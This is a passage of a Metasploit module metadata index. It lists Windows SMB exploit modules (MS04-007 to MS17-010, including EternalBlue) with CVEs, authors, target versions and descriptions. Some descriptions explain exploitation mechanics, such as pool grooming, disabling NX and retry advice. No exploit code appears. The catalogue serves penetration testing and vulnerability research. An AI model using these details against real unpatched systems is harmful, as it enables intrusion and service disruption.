"name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow",
"full_name": "exploit/windows/smb/ms04_007_killbill",
"rank": 100,
"disclosure_date": "2004-02-10",
"type": "exploit",
"author": [
"Solar Eclipse <solareclipse@phreedom.org>"
],
"description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. Your mileage may vary.",
"references": [
"CVE-2003-0818",
"OSVDB-3902",
"BID-9633",
"MSB-MS04-007"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_007_killbill",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_011_lsass": {
"name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",
"full_name": "exploit/windows/smb/ms04_011_lsass",
"rank": 400,
"disclosure_date": "2004-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will\n need to run this module twice. DCERPC request fragmentation can be performed by setting\n the 'FragSize' parameter.",
"references": [
"CVE-2003-0533",
"OSVDB-5248",
"BID-10108",
"MSB-MS04-011"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targetting",
"Windows 2000 English",
"Windows XP English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms04_011_lsass.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_011_lsass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_031_netdde": {
"name": "MS04-031 Microsoft NetDDE Service Overflow",
"full_name": "exploit/windows/smb/ms04_031_netdde",
"rank": 400,
"disclosure_date": "2004-10-12",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit affects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.",
"references": [
"CVE-2004-0206",
"OSVDB-10689",
"BID-11372",
"MSB-MS04-031"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms04_031_netdde.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_031_netdde",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms05_039_pnp": {
"name": "MS05-039 Microsoft Plug and Play Service Overflow",
"full_name": "exploit/windows/smb/ms05_039_pnp",
"rank": 400,
"disclosure_date": "2005-08-09",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the services.exe process, a failed\n exploit attempt will cause the system to automatically reboot.",
"references": [
"CVE-2005-1983",
"OSVDB-18605",
"BID-14513",
"MSB-MS05-039"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP0-SP4",
"Windows 2000 SP4 French",
"Windows 2000 SP4 Spanish",
"Windows 2000 SP4 English/French/German/Dutch",
"Windows 2000 SP0-SP4 German",
"Windows 2000 SP0-SP4 Italian",
"Windows XP SP1 English",
"Windows XP SP2 English (Requires Admin)",
"Windows Server 2003 SP0 English (Requires Admin)",
"Windows Server 2003 SP1 English (Requires Admin)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms05_039_pnp.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms05_039_pnp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_025_rasmans_reg": {
"name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow",
"full_name": "exploit/windows/smb/ms06_025_rasmans_reg",
"rank": 400,
"disclosure_date": "2006-06-13",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password are required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook",
"references": [
"CVE-2006-2370",
"OSVDB-26437",
"BID-18325",
"MSB-MS06-025"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_025_rasmans_reg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_025_rras": {
"name": "MS06-025 Microsoft RRAS Service Overflow",
"full_name": "exploit/windows/smb/ms06_025_rras",
"rank": 200,
"disclosure_date": "2006-06-13",
"type": "exploit",
"author": [
"Nicolas Pouvesle <nicolas.pouvesle@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. A valid\n username and password are required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.",
"references": [
"CVE-2006-2370",
"OSVDB-26437",
"BID-18325",
"MSB-MS06-025"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Windows 2000 SP4",
"Windows XP SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_025_rras.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_025_rras",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_040_netapi": {
"name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow",
"full_name": "exploit/windows/smb/ms06_040_netapi",
"rank": 400,
"disclosure_date": "2006-08-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.",
"references": [
"CVE-2006-3439",
"OSVDB-27845",
"BID-19409",
"MSB-MS06-040"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)",
"(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4",
"(wcscpy) Windows XP SP0/SP1",
"(stack) Windows XP SP1 English",
"(stack) Windows XP SP1 Italian",
"(wcscpy) Windows 2003 SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_040_netapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_066_nwapi": {
"name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit",
"full_name": "exploit/windows/smb/ms06_066_nwapi",
"rank": 400,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.",
"references": [
"CVE-2006-4688",
"OSVDB-30260",
"BID-21023",
"MSB-MS06-066"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_066_nwapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_066_nwwks": {
"name": "MS06-066 Microsoft Services nwwks.dll Module Exploit",
"full_name": "exploit/windows/smb/ms06_066_nwwks",
"rank": 400,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwwks.dll module.",
"references": [
"CVE-2006-4688",
"OSVDB-30260",
"BID-21023",
"MSB-MS06-066"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_066_nwwks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms06_070_wkssvc": {
"name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow",
"full_name": "exploit/windows/smb/ms06_070_wkssvc",
"rank": 0,
"disclosure_date": "2006-11-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. Also, testing shows that a machine already\n joined to a domain is not exploitable.",
"references": [
"CVE-2006-4691",
"OSVDB-30263",
"BID-20985",
"MSB-MS06-070"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targetting",
"Windows 2000 SP4",
"Windows XP SP0/SP1"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms06_070_wkssvc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms07_029_msdns_zonename": {
"name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",
"full_name": "exploit/windows/smb/ms07_029_msdns_zonename",
"rank": 0,
"disclosure_date": "2007-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.",
"references": [
"CVE-2007-1748",
"OSVDB-34100",
"MSB-MS07-029",
"URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)",
"Windows 2000 Server SP0-SP4+ English",
"Windows 2000 Server SP0-SP4+ Italian",
"Windows 2000 Server SP0-SP4+ French",
"Windows 2003 Server SP0 English",
"Windows 2003 Server SP0 French",
"Windows 2003 Server SP1-SP2 English",
"Windows 2003 Server SP1-SP2 French",
"Windows 2003 Server SP1-SP2 Spanish",
"Windows 2003 Server SP1-SP2 Italian",
"Windows 2003 Server SP1-SP2 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms07_029_msdns_zonename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms08_067_netapi": {
"name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption",
"full_name": "exploit/windows/smb/ms08_067_netapi",
"rank": 500,
"disclosure_date": "2008-10-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Brett Moore <brett.moore@insomniasec.com>",
"frank2 <frank2@dc949.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.",
"references": [
"CVE-2008-4250",
"OSVDB-49243",
"MSB-MS08-067",
"URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targeting",
"Windows 2000 Universal",
"Windows XP SP0/SP1 Universal",
"Windows 2003 SP0 Universal",
"Windows XP SP2 English (AlwaysOn NX)",
"Windows XP SP2 English (NX)",
"Windows XP SP3 English (AlwaysOn NX)",
"Windows XP SP3 English (NX)",
"Windows XP SP2 Arabic (NX)",
"Windows XP SP2 Chinese - Traditional / Taiwan (NX)",
"Windows XP SP2 Chinese - Simplified (NX)",
"Windows XP SP2 Chinese - Traditional (NX)",
"Windows XP SP2 Czech (NX)",
"Windows XP SP2 Danish (NX)",
"Windows XP SP2 German (NX)",
"Windows XP SP2 Greek (NX)",
"Windows XP SP2 Spanish (NX)",
"Windows XP SP2 Finnish (NX)",
"Windows XP SP2 French (NX)",
"Windows XP SP2 Hebrew (NX)",
"Windows XP SP2 Hungarian (NX)",
"Windows XP SP2 Italian (NX)",
"Windows XP SP2 Japanese (NX)",
"Windows XP SP2 Korean (NX)",
"Windows XP SP2 Dutch (NX)",
"Windows XP SP2 Norwegian (NX)",
"Windows XP SP2 Polish (NX)",
"Windows XP SP2 Portuguese - Brazilian (NX)",
"Windows XP SP2 Portuguese (NX)",
"Windows XP SP2 Russian (NX)",
"Windows XP SP2 Swedish (NX)",
"Windows XP SP2 Turkish (NX)",
"Windows XP SP3 Arabic (NX)",
"Windows XP SP3 Chinese - Traditional / Taiwan (NX)",
"Windows XP SP3 Chinese - Simplified (NX)",
"Windows XP SP3 Chinese - Traditional (NX)",
"Windows XP SP3 Czech (NX)",
"Windows XP SP3 Danish (NX)",
"Windows XP SP3 German (NX)",
"Windows XP SP3 Greek (NX)",
"Windows XP SP3 Spanish (NX)",
"Windows XP SP3 Finnish (NX)",
"Windows XP SP3 French (NX)",
"Windows XP SP3 Hebrew (NX)",
"Windows XP SP3 Hungarian (NX)",
"Windows XP SP3 Italian (NX)",
"Windows XP SP3 Japanese (NX)",
"Windows XP SP3 Korean (NX)",
"Windows XP SP3 Dutch (NX)",
"Windows XP SP3 Norwegian (NX)",
"Windows XP SP3 Polish (NX)",
"Windows XP SP3 Portuguese - Brazilian (NX)",
"Windows XP SP3 Portuguese (NX)",
"Windows XP SP3 Russian (NX)",
"Windows XP SP3 Swedish (NX)",
"Windows XP SP3 Turkish (NX)",
"Windows 2003 SP1 English (NO NX)",
"Windows 2003 SP1 English (NX)",
"Windows 2003 SP1 Japanese (NO NX)",
"Windows 2003 SP1 Spanish (NO NX)",
"Windows 2003 SP1 Spanish (NX)",
"Windows 2003 SP1 French (NO NX)",
"Windows 2003 SP1 French (NX)",
"Windows 2003 SP2 English (NO NX)",
"Windows 2003 SP2 English (NX)",
"Windows 2003 SP2 German (NO NX)",
"Windows 2003 SP2 German (NX)",
"Windows 2003 SP2 Portuguese - Brazilian (NX)",
"Windows 2003 SP2 Spanish (NO NX)",
"Windows 2003 SP2 Spanish (NX)",
"Windows 2003 SP2 Japanese (NO NX)",
"Windows 2003 SP2 French (NO NX)",
"Windows 2003 SP2 French (NX)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms08_067_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms08_067_netapi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms09_050_smb2_negotiate_func_index": {
"name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",
"full_name": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index",
"rank": 400,
"disclosure_date": "2009-09-07",
"type": "exploit",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.",
"references": [
"MSB-MS09-050",
"CVE-2009-3103",
"BID-36299",
"OSVDB-57799",
"URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
"URL-http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows Vista SP1/SP2 and Server 2008 (x86)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms10_046_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"B_H"
],
"description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.",
"references": [
"CVE-2010-2568",
"OSVDB-66387",
"MSB-MS10-046",
"URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms10_061_spoolss": {
"name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability",
"full_name": "exploit/windows/smb/ms10_061_spoolss",
"rank": 600,
"disclosure_date": "2010-09-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.",
"references": [
"OSVDB-67988",
"CVE-2010-2729",
"MSB-MS10-061"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms10_061_spoolss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms15_020_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2015-03-10",
"type": "exploit",
"author": [
"Michael Heerklotz",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.",
"references": [
"CVE-2015-0096",
"MSB-MS15-020",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms17_010_eternalblue": {
"name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"full_name": "exploit/windows/smb/ms17_010_eternalblue",
"rank": 200,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Sean Dillon <sean.dillon@risksense.com>",
"Dylan Davis <dylan.davis@risksense.com>",
"Equation Group",
"Shadow Brokers",
"thelightcosine"
],
"description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"URL-https://github.com/RiskSense-Ops/MS17-010"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 and Server 2008 R2 (x64) All Service Packs"
],
"mod_time": "2018-11-05 17:16:16 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_eternalblue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/ms17_010_eternalblue_win8": {
"name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+",
"full_name": "exploit/windows/smb/ms17_010_eternalblue_win8",
"rank": 200,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Equation Group",
"Shadow Brokers",
"sleepya",
"wvu <wvu@metasploit.com>"
],
"description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Windows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0146",
"CVE-2017-0147",
"CVE-2017-0148",
"EDB-42030",
"URL-https://github.com/worawit/MS17-010"
],
"platform": "Windows",
"arch": "x64",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"win x64"
],
"mod_time": "2018-10-11 17:23:59 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_eternalblue_win8",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/ms17_010_psexec": {
"name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution",
"full_name": "exploit/windows/smb/ms17_010_psexec",
"rank": 300,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"sleepya",
"zerosum0x0",
"Shadow Brokers",
"Equation Group"
],
"description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.",
"references": [
"MSB-MS17-010",
"CVE-2017-0143",
"CVE-2017-0146",
"CVE-2017-0147",
